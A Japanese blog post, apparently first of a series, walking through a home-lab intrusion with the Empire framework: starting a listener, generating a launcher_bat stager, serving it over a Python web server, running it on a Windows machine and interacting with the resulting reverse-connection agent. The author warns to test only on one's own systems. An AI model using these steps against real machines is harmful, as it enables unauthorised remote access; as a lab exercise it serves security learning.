とある親父の侵入実験【Empire:帝国の力 前編】
はい、久しぶりにペネトレします。散々紹介してきたEmpireってツールを使って対象端末のパスワードを調べてみようかと思います。
ここで取り上げる検証等を実施する際は、全て自分の管理している環境で検証してください。使い方、実施場所を誤ると法に触れて罰せられます。
準備したもの
- MacBook Pro
- ダークサイドに堕ちたフォース
環境(仮想環境)
1 待受準備
まずは、Kali側でEmpireを起動しリスナーモードを立ち上げる。
(Empire) > listeners
(Empire: listeners) >
(Empire: listeners) > info
infoコマンドで見るとこんな感じ。今回は何も変更せずにこのまま「test」って名前のリスナーを作る。
このまま実行
(Empire: listeners) > execute
「list」で確認すると上図のようになってる。これで待ち受け完了。
2 侵入準備
次にこのリスナーに接続に来るファイルを作成する。macroにしたりexeにしたりと色々できるけど今回はお手軽なbatファイルを作成する。
(Empire: listeners) > usestager launcher_bat (リスナーの名前:今回はtest)
(Empire: stager/launcher_bat) > info
とりあえずこんな感じになります。これもこのままのデフォルト設定で作成します。
(Empire: stager/launcher_bat) > execute
/tmp配下に作成された様子。
とりあえず今回は、こいつをWebサーバを立ち上げてデリバリーする。
python -m SimpleHTTPServer 80
3 配達・実行
今度はWindows側でブラウザを立ち上げて先ほど立ち上げたWebサーバにアクセスする。
真ん中あたりに作成したbatがあるので、これをダウンロードして実行
とりあえず「実行」する。
4 侵入完了
Kali側に戻って確認するとリバース接続があるのが確認できる。
(Empire: stager/launcher_bat) > agents
エージェントモードに切り替えることで、端末から接続があるのが確認できる。次にこの端末にインタラクトする。
(Empire: agents) > interact (セッションID:TPESSRK3BLUPTA4G)
(Empire: TPESSRK3BLUPTA4G) > info
無事に侵入できたところで一旦終了w